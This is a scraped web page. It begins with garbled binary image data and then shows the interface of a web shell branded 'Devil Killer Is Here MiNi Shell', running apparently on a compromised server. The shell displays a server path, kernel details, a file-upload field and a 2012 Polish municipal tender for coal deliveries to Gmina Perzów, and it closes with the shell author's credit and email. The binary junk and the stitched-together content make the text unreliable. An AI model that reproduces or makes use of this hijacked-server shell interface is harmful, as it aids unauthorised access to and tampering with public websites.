JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348754-N-2012.html

<p class="kh_header"><b>Perzów: DOSTAWA OPAŁU DO BUDYNKÓW ZNAJDUJĄCYCH SIĘ POD ZARZĄDEM GMINY PERZÓW W SEZONIE GRZEWCZYM 2012/2013
(w okresie 12 miesięcy)
ZADANIE PODZIELONE NA DWIE CZĘŚCI:
CZĘŚĆ A:  DOSTAWA WĘGLA
CZĘŚĆ B: DOSTAWA MIAŁU WĘGLOWEGO</b><br>
<b>Numer ogłoszenia: 348754 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Perzów , 78, 63-642 Perzów, woj. wielkopolskie, tel. 0-62 78 61 060, faks 0-62 78 61 509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://perzow.nowoczesnagmina.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA OPAŁU DO BUDYNKÓW ZNAJDUJĄCYCH SIĘ POD ZARZĄDEM GMINY PERZÓW W SEZONIE GRZEWCZYM 2012/2013
(w okresie 12 miesięcy)
ZADANIE PODZIELONE NA DWIE CZĘŚCI:
CZĘŚĆ A:  DOSTAWA WĘGLA
CZĘŚĆ B: DOSTAWA MIAŁU WĘGLOWEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na podstawie art. 83 ust. 2 i 3 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - tekst jednolity Dz. U. 2010  Nr 113 poz. 759 z późn. zmianami, Zamawiający podzielił zamówienie na dwie części, gdzie wykonawca może złożyć oferty częściowe na jedną lub dwie części zamówienia.

CZĘŚĆ A
a)	Przedmiotem zamówienia jest dostawa węgla - orzech na terenie Gminy Perzów w sezonie grzewczym 2012/2013 w okresie 12 miesięcy od daty podpisania umowy. 

b)	Zakres zamówienia obejmuje:

Zakres zamówienia obejmuje sukcesywną dostawę węgla - orzech w ilości wskazanej każdorazowo w zleceniu (dopuszcza się zlecenie w formie telefonicznej) wraz z transportem i wyładunkiem, w miejscu wskazanym przez Zamawiającego tj. bezpośrednio do obiektów i budowli, na terenie gminy Perzów w terminie 3 dni od dnia zgłoszenia zapotrzebowania przy czym dzień dostawy nie powinien być dniem deszczowym (z wyjątkiem wyrażenia zgody przez Zamawiającego). Ustala się minimalną ilość jednorazowej dostawy do poszczególnego obiektu na poziomie 500 kg. Miejscem dostawy będą obiekty, kotłownie, jednostki podległe Urzędowi Gminy w Perzowie. 

Wielkość zamówienia w okresie dostawy szacunkowo określa się na 100 ton węgla - orzech.
Węgiel orzech dostarczany w wyniku rozstrzygnięcia niniejszego zamówienia publicznego musi spełniać następujące parametry:

minimalna wartość opałowa (Kj/Kg) 29000, 
maksymalna zawartość popiołu (Ar/Ad) 7%,
maksymalna zawartość siarki (Str/Std) 0,8%,

Miejscem dostawy będą budynki i kotłownie znajdujące się na terenie Gminy Perzów, które są pod zarządem Gminy, bądź obiekty z właścicielami których Gmina zawarła umowę na dostawę energii cieplnej. 
- Perzów 34 - Agronomówka,
- Perzów 78 - Budynek Urzędu Gminy w Perzowie,
- Budynek Trębaczów 30,
- Budynek Turkowy 5
- Dom Ludowy Domasłów,
- Dom Ludowy Trębaczów,
- Kotłownia Ludwiczyn.
Wielkość zamówienia w okresie dostawy może ulec zmianie zgodnie z zapotrzebowaniem Zamawiającego oraz w zależności od panujących warunków atmosferycznych w sezonie grzewczym 2012/2013. Zmniejszenie wielkości dostawy nie będzie upoważniało wykonawcy do żądania zrealizowania całości zamówienia lub rekompensaty pieniężnej za niezrealizowaną wielkość  zamówienia.
Cena przedstawiona w formularzu ofertowym ma obejmować sukcesywne dostawy węgla-orzech do poszczególnych obiektów wymienionych powyżej, wraz z wyładunkiem oraz w ilości określonej każdorazowo dla poszczególnego obiektu w zleceniu (dopuszcza się zlecenie telefoniczne).
Dostarczany asortyment opału musi odpowiadać jakości i wymogom dopuszczonych do obrotu, oraz wyżej wyszczególnionym wymogom, a Zamawiający zastrzega sobie prawo sprawdzenia przestrzegania przez Wykonawcę zamówienia parametrów dostarczanego opału, poprzez pobranie jego próbki i oddanie do zbadania w niezależnym laboratorium na koszt wykonawcy, jednak nie częściej niż raz w miesiącu.
Każdorazowo do poszczególnej dostawy (na żądanie Zamawiającego), wykonawca zamówienia zobowiązany jest przedstawić aktualne zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczany węgiel - orzech, odpowiada parametrom określonym powyżej.  
W przypadku stwierdzenia przez Zamawiającego, iż dostarczane produkty nie spełniają wymaganych parametrów, Wykonawca natychmiast (tj. w ciągu  3 dni) dokona wymiany produktu (na własny koszt), na produkt spełniający parametry. W przypadku uchylania się wykonawcy od wykonania wymiany produktu, Zamawiający ma prawo dokonać zakupu węgla spełniającego parametry u innego dostawcy, obciążając Wykonawcę różnicą w cenie zakupu.


CZĘŚĆ B
a)	Przedmiotem zamówienia jest dostawa miału węglowego na terenie Gminy Perzów w sezonie grzewczym 2012/2013 w okresie 12 miesięcy od daty podpisania umowy. 

b)	Zakres zamówienia obejmuje:

Zakres zamówienia obejmuje sukcesywną dostawę miału węglowego w ilości wskazanej każdorazowo w zleceniu (dopuszcza się zlecenie w formie telefonicznej) wraz z transportem i wyładunkiem, w miejscu wskazanym przez Zamawiającego tj. bezpośrednio do obiektów i budowli, na terenie gminy Perzów w terminie 3 dni od dnia zgłoszenia zapotrzebowania przy czym dzień dostawy nie powinien być dniem deszczowym (z wyjątkiem wyrażenia zgody przez Zamawiającego). Ustala się minimalną ilość jednorazowej dostawy do poszczególnego obiektu na poziomie 500 kg. Miejscem dostawy będą obiekty, kotłownie, jednostki podległe Urzędowi Gminy w Perzowie. 

Wielkość zamówienia w okresie dostawy szacunkowo określa się na 250 ton miału węglowego.
Miał węglowy dostarczany w wyniku rozstrzygnięcia niniejszego zamówienia publicznego musi spełniać następujące parametry:

minimalna wartość opałowa (Kj/Kg) 23000, 
maksymalna zawartość popiołu (Ar/Ad) 15,0%, 
maksymalna zawartość siarki (Str/Std) 0,8%.

Miejscem dostawy będą budynki i kotłownie znajdujące się na terenie Gminy Perzów, które są pod zarządem Gminy, bądź obiekty z właścicielami których Gmina zawarła umowę na dostawę energii cieplnej. 
- Perzów 34 - Agronomówka,
- Perzów 78 - Budynek Urzędu Gminy w Perzowie,
- Budynek Trębaczów 30,
- Budynek Turkowy 5
- Dom Ludowy Domasłów,
- Dom Ludowy Trębaczów,
- Kotłownia Ludwiczyn.
Wielkość zamówienia w okresie dostawy może ulec zmianie zgodnie z zapotrzebowaniem Zamawiającego oraz w zależności od panujących warunków atmosferycznych w sezonie grzewczym 2012/2013. Zmniejszenie wielkości dostawy nie będzie upoważniało wykonawcy do żądania zrealizowania całości zamówienia lub rekompensaty pieniężnej za niezrealizowaną wielkość  zamówienia.
Cena przedstawiona w formularzu ofertowym ma obejmować sukcesywne dostawy miału węglowego do poszczególnych obiektów wymienionych powyżej, wraz z wyładunkiem oraz w ilości określonej każdorazowo dla poszczególnego obiektu w zleceniu (dopuszcza się zlecenie telefoniczne).
Dostarczany asortyment opału musi odpowiadać jakości i wymogom dopuszczonych do obrotu, oraz wyżej wyszczególnionym wymogom, a Zamawiający zastrzega sobie prawo sprawdzenia przestrzegania przez Wykonawcę zamówienia parametrów dostarczanego opału, poprzez pobranie jego próbki i oddanie do zbadania w niezależnym laboratorium na koszt wykonawcy, jednak nie częściej niż raz w miesiącu.
Każdorazowo do poszczególnej dostawy (na żądanie Zamawiającego), wykonawca zamówienia zobowiązany jest przedstawić aktualne zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające, że dostarczany miał węglowy, odpowiada parametrom określonym powyżej.  
W przypadku stwierdzenia przez Zamawiającego, iż dostarczane produkty nie spełniają wymaganych parametrów, Wykonawca natychmiast (tj. w ciągu  3 dni) dokona wymiany produktu (na własny koszt), na produkt spełniający parametry. W przypadku uchylania się wykonawcy od wykonania wymiany produktu, Zamawiający ma prawo dokonać zakupu miału spełniającego parametry u innego dostawcy, obciążając Wykonawcę różnicą w cenie zakupu.

Zamówienia dostaw opału w  wyniku udzielenia zamówienia publicznego będą dokonywane bezpośrednio przez osoby zatrudnione w Referacie Ochrony Środowiska, Gospodarki Przestrzennej, Komunalnej, Rolnictwa i Oświaty w Urzędzie Gminy w Perzowie. Faktury będą wystawiane na Gminę Perzów, dane do faktury:

- Gmina Perzów, Perzów 78, 63-642 Perzów , NIP: 619-19-45-096..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny tego warunku: sprawdzenie spełnienia tego warunku  nastąpi na podstawie oświadczenia oferenta, stanowiącego załącznik do specyfikacji (załącznik nr 2 wzór oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. (tekst jednolity Dz. U. z 2010 r., Nr 113, poz. 759 z późn zmianami.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny tego warunku: sprawdzenie spełnienia tego warunku  nastąpi na podstawie oświadczenia oferenta, stanowiącego załącznik do specyfikacji (załącznik nr 2 wzór oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. (tekst jednolity Dz. U. z 2010 r., Nr 113, poz. 759 z późn zmianami.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny tego warunku: sprawdzenie spełnienia tego warunku  nastąpi na podstawie oświadczenia oferenta, stanowiącego załącznik do specyfikacji (załącznik nr 2 wzór oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. (tekst jednolity Dz. U. z 2010 r., Nr 113, poz. 759 z późn zmianami.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny tego warunku: sprawdzenie spełnienia tego warunku  nastąpi na podstawie oświadczenia oferenta, stanowiącego załącznik do specyfikacji (załącznik nr 2 wzór oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. (tekst jednolity Dz. U. z 2010 r., Nr 113, poz. 759 z późn zmianami.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny tego warunku: sprawdzenie spełnienia tego warunku  nastąpi na podstawie oświadczenia oferenta, stanowiącego załącznik do specyfikacji (załącznik nr 2 wzór oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. (tekst jednolity Dz. U. z 2010 r., Nr 113, poz. 759 z późn zmianami.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-wypełniony i podpisany formularz ofertowy, przygotowany na formularzu stanowiącym załącznik nr 1 do Specyfikacji wraz ze wskazaniem udziału podwykonawców i czynności im powierzonych;
-zaakceptowany i podpisany przez wykonawcę wzór umowy ( wg załącznika nr 4 do SIWZ); 
-w przypadku wykonawców składających ofertę wspólnie - pełnomocnictwo dla jednego z tych podmiotów do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 ust. 2 Pzp). Wymagania dotyczące dokumentów odnoszą się wówczas do wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, z tym ze warunki udziału w postępowaniu mogą być spełnione łącznie, natomiast  niepodleganie wykluczeniu przez każdego wykonawcę oddzielnie.
-pełnomocnictwo do podpisania oferty o ile nie wynika ono z ww. dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://perzow.nowoczesnagmina.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Perzowie, 63-642 Perzów 78, pok. nr 8 lub za pośrednictwem poczty w cenie 50,00 zł. Wpłata na konto U.G. w Perzowie, SBL Perzów nr 04 8413 0000 0200 0619 2000 0001..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 09:00, miejsce: Urząd Gminy w Perzowie, 63-642 Perzów 78, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com